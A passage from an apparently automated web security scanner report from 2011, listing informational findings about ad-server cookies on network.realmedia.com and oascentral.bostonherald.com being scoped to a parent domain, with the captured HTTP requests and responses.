GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:19:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:54 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.125. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

10.126. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

10.127. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwJwO101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript

document.write ('\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

10.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

10.129. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
